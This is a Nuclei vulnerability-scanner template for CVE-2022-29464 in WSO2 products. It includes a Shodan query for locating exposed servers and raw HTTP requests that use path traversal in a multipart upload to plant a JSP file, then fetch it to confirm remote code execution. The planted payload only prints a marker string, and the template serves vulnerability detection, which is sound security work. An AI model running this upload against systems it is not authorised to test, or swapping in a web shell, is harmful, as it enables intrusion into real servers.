nuclei-templates/cves/2022/CVE-2022-29464.yaml

45 lines
1.9 KiB
YAML

id: CVE-2022-29464
info:
name: WSO2 Management - Unrestricted Arbitrary File Upload & Remote Code Execution
author: luci,dhiyaneshDk
severity: critical
description: Certain WSO2 products allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0.
reference:
- https://shanesec.github.io/2022/04/21/Wso2-Vul-Analysis-cve-2022-29464/
- https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738
- https://nvd.nist.gov/vuln/detail/CVE-2022-29464
- https://github.com/hakivvi/CVE-2022-29464
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-29464
cwe-id: CWE-434
metadata:
shodan-query: http.favicon.hash:1398055326
tags: cve,cve2022,rce,fileupload,wso2,intrusive
requests:
- raw:
- |
POST /fileupload/toolsAny HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311
Content-Length: 348
-----------------------------250033711231076532771336998311
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/{{to_lower("{{randstr}}")}}.jsp";filename="test.jsp"
Content-Type: application/octet-stream
<% out.print("WSO2-RCE-CVE-2022-29464"); %>
-----------------------------250033711231076532771336998311--
- |
GET /authenticationendpoint/{{to_lower("{{randstr}}")}}.jsp HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- "contains(body_2, 'WSO2-RCE-CVE-2022-29464')"